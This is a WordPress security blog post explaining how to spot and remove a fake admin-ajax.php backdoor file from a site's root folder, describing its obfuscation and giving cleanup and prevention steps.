webstut
website security wp admin ajax
WordPress

How to Detect and Remove the Malicious admin-ajax.php File from Your WordPress Site

By 3 Mins Read

WordPress is a popular platform for creating websites, but its popularity also makes it a target for hackers. Recently, a malicious admin-ajax.php file was discovered in a WordPress site’s root folder, raising concerns about security. In this blog post, we will discuss how to detect this malicious file, remove it, and take steps to prevent future security breaches.

What is the Malicious admin-ajax.php File?

The admin-ajax.php file you might find in your WordPress root folder is not the legitimate WordPress file but a malicious script designed to compromise your site. This file contains obfuscated PHP code that executes arbitrary commands, gathers system information, and creates backdoors for attackers to gain access to your site.

Below is an image from the code found in this file:

image of malicious code in admin-ajax.php file in root folder

How to Detect the Malicious admin-ajax.php File

  1. Unusual File Presence: Check your root directory for any unusual files, especially admin-ajax.php, which should not be located there.
  2. File Content Inspection: Open the admin-ajax.php file and look for obfuscated code, functions like base64_decode, or dynamic file inclusion (include or file_put_contents).
  3. Security Plugins: Use security plugins like Wordfence or Sucuri to scan your site for malicious files and activities.

Analyzing the Malicious Code

The malicious admin-ajax.php file contains several suspicious elements:

  • Obfuscation: The code uses XOR encoding and base64 decoding to hide its true purpose.
  • Dynamic File Writing: It creates and includes dynamic PHP files, allowing attackers to execute arbitrary code.
  • Data Gathering: Functions like phpversion() collect system information, which is often used by backdoors.

How to Remove the Malicious admin-ajax.php File

  1. Backup Your Site: Before making any changes, backup your entire site, including the database.
  2. Delete the File: Manually delete the admin-ajax.php file from your root directory.
  3. Scan for Additional Malicious Files: Use security plugins to scan and remove any other malicious files that may have been uploaded.
  4. Change Passwords: Update all your passwords, including WordPress admin, hosting account, database, and FTP.

Preventing Future Security Breaches

  1. Keep WordPress Updated: Always update WordPress core, themes, and plugins to their latest versions.
  2. Use Security Plugins: Install security plugins like Wordfence, Sucuri, or iThemes Security to provide an additional layer of protection.
  3. Regular Backups: Regularly backup your site and store backups in a secure location.
  4. Strong Passwords: Use strong, unique passwords for all your accounts and change them regularly.
  5. Limit Access: Only provide access to your WordPress admin dashboard to trusted users and limit file permissions on your server.

Conclusion

Security is a critical aspect of managing a WordPress site. By being vigilant and taking proactive measures, you can protect your site from malicious attacks. Regularly check your site for unusual files, keep everything updated, and use security plugins to help safeguard your site. If you suspect your site has been compromised, take immediate action to remove the threat and strengthen your security practices.

Stay safe and keep your WordPress site secure!

Related Posts